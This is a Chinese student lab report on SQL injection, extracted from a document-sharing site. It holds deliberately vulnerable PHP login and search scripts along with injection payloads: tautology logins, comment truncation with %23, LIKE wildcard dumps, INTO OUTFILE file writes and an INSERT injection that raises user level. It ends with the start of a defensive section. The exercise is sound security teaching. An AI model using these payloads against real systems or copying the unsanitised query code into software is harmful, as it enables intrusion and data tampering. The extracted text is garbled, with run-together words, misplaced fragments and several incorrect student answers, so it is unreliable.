信息安全实验4-报告模板_第1页
信息安全实验4-报告模板_第2页
信息安全实验4-报告模板_第3页
信息安全实验4-报告模板_第4页
信息安全实验4-报告模板_第5页
已阅读5页,还剩7页未读 继续免费阅读

付费下载

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

阳光学院计算机科学与技术系信息安全实验报告专 业:计算机科学与技术年 级: 2015级组 别: 1B学 号:姓 名: 邹驼玲2017年 月 日实验4 数据库安全练习一、 SQL注入【实验目的】了解SQL注入的基本原理掌握PHP脚本访问 MySQL数据库的基本方法掌握程序设计中避免出现 SQL注入漏洞的基本方法【实验人数】每组1人【系统环境】Linux【网络环境】交换网络结构【实验类型】设计型【实验步骤】「注」实验步骤中涉及到的 mysql数据库操作命令和 php脚本源码,均在 /opt/ExpNIC/HostSec-Lab/Projects 目录中提供。一.PHP访问MySQL简单实例创建隶属test数据库的user表启动mysql服务①在控制台中输入如下命令启动 mysql服务。缺省状态下 root 用户密码为空。servicemysqldstart②可通过如下命令查看 mysql服务是否启动成功。servicemysqldstatus创建user数据库表在控制台中输入 mysql,进入mysql客户端控制台( mysql>)。①选择工作数据库 test(缺少状态下, test 数据库已被创建)。usetest;②创建user数据库表CREATETABLEuser(useridint(11)NOTNULLAUTO_INCREMENT,usernamevarchar(20)NOTNULLDEFAULT"",passwordvarchar(20)NOTNULLDEFAULT"",PRIMARYKEY(userid))TYPE=MyISAMAUTO_INCREMENT=3;③插入两条数据信息INSERTINTOuserVALUES(1,"angel","mypass");INSERTINTOuserVALUES(2,"lblis","yourpass");④查看数据库表select*fromuser;编写PHP脚本查询user数据库表编写access.php脚本,内容如下:<php$servername="localhost"

#定义变量

MySQL服务器名称$dbusername="root";

#访问

MySQL数据库的用户名称$dbpassword="";

#root

用户密码,默认为空$dbname="test";

#工作数据库$username=$_GET['username'];

#利用

HTTP的GET方法,从

URL中获取

username参数值$password=$_GET['password'];

#获取

password

参数值##连接到MySQL服务器$dbcnx=mysql_connect($servername,$dbusername,$dbpassword);{if(!$dbcnx){echo(" 连接MySQL服务器失败".mysql_error());exit();}}选择工作数据库if(!mysql_select_db($dbname,$dbcnx)){echo("激活$dbname数据库失败".mysql_error());exit();}##SQL查询$sql_select="SELECT*FROMuserWHEREusername='$username'ANDpassword='$password'";$result=mysql_query($sql_select,$dbcnx);$userinfo=mysql_fetch_array($result);if(empty($userinfo)){echo("登录失败");}else{echo("登录成功");}echo"<p>SQL查询:$sql_select<p>";>从代码中可知,当输入正确的用户名和密码后,就会提示登录成功,否则登录失败。单击桌面控制面板中“ Web浏览器”按钮,当我们在 URL地址栏中提交:本机IP/access.phpusername=angel&password=mypassWeb页面会提示“登录成功” 。写出此时PHP脚本中具体的 SQL查询语句:SELECT*FROMuserWHEREusername= ’angel’ANDpassword=’mypass’实施SQL注入在URL地址栏中提交:本机IP/access.phpusername=angel'or1=1注入是否成功? 否 。写出此时PHP脚本中具体的 SQL查询语句:SELECT*FROMuserWHEREusername= ’angel’or1=1’ANDpassword=”在URL地址栏中提交:本机IP/access.phpusername=angel'or'1=1注入是否成功? 是

。写出此时PHP脚本中具体的

SQL查询语句:SELECT*FROMuserWHEREusername=’angel’or ‘1=1’ANDpassword=”通过分析SQL查询语句解释实验现象:username=’angel’or1=1’是不合法的,username=’angel’or‘1=1’是合法的用户,名注入,且任何数或上1都为1,所以成功。在URL地址栏中提交:本机IP/access.phpusername=angel'%23注入是否成功? 是

。写出此时PHP脚本中具体的

SQL查询语句:SELECT*FROMuserWHEREusername=’angel

’#’ANDpassword=”此处利用了MySQL支持“#”注释格式的特性,在提交的时候会将#后面的语句注释掉。由于编码问题,在多数Web浏览器URL地址栏里直接提交#会变成空,所以这里使用了字符“#”的ASCII码值0x23。Mysql还支持“/*”注释格式,请写出利用“/*”实现注入的URL,以及此时的SQL查询语句。SQL查询语句:SELECT*FROMuserWHEREusername=’angel’*’ANDpassword=”URL:’%2F%2A步骤(2)通过向username注入逻辑or运算,在只需知晓用户名的情况下便可成功登录。下面请设计单独向password注入逻辑运算(可多个),要求在只需知晓用户名的情况下实现登录:SQL查询语句:SELECT*FROMuserWHEREusername=’angel’or1=1’ANDpassword=”URL:’%20or%201=1下面请设计SQL查询语句,要求在不需要知晓用户名和密码的情况下实现登录。提示:通过猜测用户ID字段名称与用户序列号,结合逻辑运算,向password进行注入。SQL查询语句:SELECT*FROMuserWHEREusername=’angel’or‘1=1’ANDpassword=”URL:’%20or%20’1=1二.搜索引擎注入值得注意的是,Internet上有许多的PHP程序搜索引擎是存在问题的,也就是提交特殊字符就可以显示所有记录,包括不符合条件的。创建隶属test数据库的file表创建file数据库表file 数据库表结构如下:CREATETABLEfile(fileid int(11)NOTNULLAUTO_INCREMENT,title varchar(20)NOTNULLDEFAULT"",author varchar(20)NOTNULLDEFAULT"",summary varchar(1024)NOTNULLDEFAULT"",PRIMARYKEY(fileid))TYPE=MyISAMAUTO_INCREMENT=3;插入四条数据信息titleauthorsummaryhoneypothoneypotandhoneynetsnortsnortintrusiondetectionsnortbasednetworkppianothersnortpaperiptables+snortnonameintelligenceids2.编写

HTML页面通过HTML页面提交表单给服务器端据库进行查询,最后将查询结果返回给

PHP脚本,由 PHP根据表单索引关键字对HTML页面。HTML页面代码如下:

MySQL数<html><body><formaction="search.php"method="post">

#指定处理表单请求的

PHP脚本为

search.php<tableborder="0"><trbgcolor="#cccaaa"><tdwidth="300">

文档搜索引擎

</td></tr></table><p><tableborder="0"><tr><td> 关键字:</td><tdalign="left"><inputtype="text"name="key"size="32"maxlength="32"></td></tr><tr><tdbgcolor="#cccaaa"colspan="2"align="left"><inputtype="submit"value="</tr>

搜索"></td></form></body></html>HTML页面如图所示:编写PHP脚本查询file数据库表<php$key=$_POST['key']; #从html表单中提取变量值><html><head><title> 搜索结果</title></head><body><h3>文档搜索引擎</h3><php>echo"搜索关键字:$key<p>";echo"文档搜索时间: $key<p>";echodate("H:i,jSF<p>");echo"搜索结果:";$servername="localhost";$dbusername="root";$dbpassword="";$dbname="test";$tablename="";$result=mysql_connect($servername,$dbusername,$dbpassword);if(!$result){echo("连接mysql服务器失败");exit();}if(!empty($key)){$sql_select="SELECT*FROMfileWHEREtitleLIKE'%$key%'"; #模糊查询title 中含有指定关键字的记录,其中 %符号表示通配,这里前、后均通配$result=mysql_db_query($dbname,$sql_select);if(empty($result)){echo"error";exit();}$total=mysql_num_rows($result);if($total<=0)echo"<p>The$keywasnotfoundinalltherecord<p>";else{while($file=mysql_fetch_array($result))echo("<li>".htmlspecialchars($file[title])."<p>");echo("摘要:".htmlspecialchars($file[summary]));}else{echo("<b> 请输入查询关键字 .</b><p>");}exit();></body></html>含与

输入关键字“snort”,进行搜索,搜索结果中含有多少条记录?snort 关键字无关的项 无 。写出此时PHP脚本中具体的 SQL查询语句:

3

。记录中是否包SELE

CT*FORMfileWHEREtitleLIKE

‘ %$snort%’”;4.SQL注入snort

(1) 利用PHP脚本没有对关键字变量进行检查的漏洞进入 SQL注入。输入关键字“%”,进行搜索,搜索结果中含有多少条记录? 4 。记录中是否包含与关键字无关的项 2 个分别为:honeypotpater 和iptables+snort 。写出此时PHP脚本中具体的 SQL查询语句:SELECT*FORMfileWHEREtitleLIKE

‘ %$%%’”;解释

SQL查询语句含义:搜索表,并对 file 表搜索关键字“ %”的数据输入关键字“_’ORDERBYfileid#”「说明」“_”字符表示单字符通配, n个“_”字符则表示 n字符通配。“ORDERBYfileid”表示按特定顺序进行

SQL查询。若

fileid

为整型字段,则按整数大小(由小到大)顺序进行查询;若

fileid

为字符数组类型字段,则按字符

ASCII

码(由前到后)顺序进行查询。写出此时

PHP脚本中具体的

SQL查询语句:SELECT*FORMfileWHEREtitleLIKE

‘ %$_’ORDERBYfileid#%

’”;解释

SQL查询语句含义:搜索表,并对

file

表搜索关键字“

_’ORDERBYfileid#

’”的数据三.注入实现导出文件本实验步骤仅为说明由于 SQL注入而给服务器系统带来一定程度上的危害。在步骤一中,我们使用用户名, 在无需知晓用户密码的情况下, 通过SQL注入实现了登录。作为进一步操作, 我们可以通过 SQL注入来向服务器硬盘中写入大量无用的文件, 而这是利用了 MySQL的“INTOOUTFILE”命令,其查询方法如下 :SELECT*FROMuserWHEREcondINTOOUTFILE'/etc/temp.txt';上述SQL查询语句会将 user数据库表中,满足 cond条件的记录以 INTOOUTFILE标准格式导出到/etc/temp.txt 文件中。而信息能够被成功导出到 /etc/temp.txt 中的条件是目标目录有可写的权限和目标文件不存在。基于步骤一,写出能够实现( SQL注入)上述功能的 URL:OUTFILE ’/etc/temp.txt写出此时PHP脚本中具体的 SQL查询语句:SELECT*FROMuserWHEREusername=’angel’AND‘passname=mypass’OUTFILE’/etc/temp.txt’四.通过注入提升用户权限如果大家认为SQL注入仅仅适用于SELECT语句就大错特错了,其实还有两个危害更大的操作,那就是INSERT和UPDATE语句。创建隶属test数据库的register表切换至/opt/ExpNIC/HostSec-Lab/Projects/step4/ 目录,执行脚本create_table_register 创建register 数据库表。写出数据表包含的字段名称:Userid 、username、password 、homepage、userlevel(2) 注册用户将/opt/ExpNIC/HostSec-Lab/Projects/step4/ 目录中的 register.htm 和register.php文件拷贝至/var/www/html 目录下。在Web浏览器URL地址栏中访问register.htm页面。填写“用户名”、“用户口令”和“个人主页”信息,单击“注册”按钮,进行注册。注册用户级别( userlevel ) 3 。截图,注册成功的图,图里面需要包含地址栏SQL注入提升注册用户权限返回到register.htm 页面,按如下方法填写“个人主页”信息。','1')#单击“注册”按钮,用户注册级别 1 。写出此时PHP脚本中具体的 SQL查询语句:INSEERT INTOregisterVALUES(0, ’zoutuoling ’,’123456’,’’,’1’)#’,3)【思考问题】1.SQL注入漏洞产生的原因是什么?练习二、 防范SQL注入【实验目的】了解防范SQL注入的方法学会利用合法性校验防范 SQL注入学会利用preparedstatement 执行SQL查询【实验人数】每组1人【系统环境】Linux【网络环境】交换网络结构【实验工具】--【实验类型】设计型【实验步骤】一.客户端进行合法性校验进行实验之前首先启动 MySQL服务,命令如下:servicemysqldstart(1) 单击工具栏“控制台”按钮,进入实验目录。 login 是存在SQL注入漏洞的 Web应用程序。复制 login.htm 和login.php 文件到/var/www/html/ 目录(Web服务文档主目录)。使用Web浏览器浏览login.htm,在URL地址栏中输入如下信息:本机IP地址/login.htm进入“注册会员登录”页面,用户名: hello,密码:hellopass ,确定登录成功。(3) 注入攻击返回login.htm 登录界面,输入用户名: hello'or'1=1 ,密码任意,尝试登录。由于login.htm没有对“用户名”、“密码”输入数据的合法性进行验证,从而导致了SQL被注入。(4) 编辑/var/www/html/login.htm 文件,利用 JavaScript 对用户输入数据进行合法性验证,限制用户输入“'”(单

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论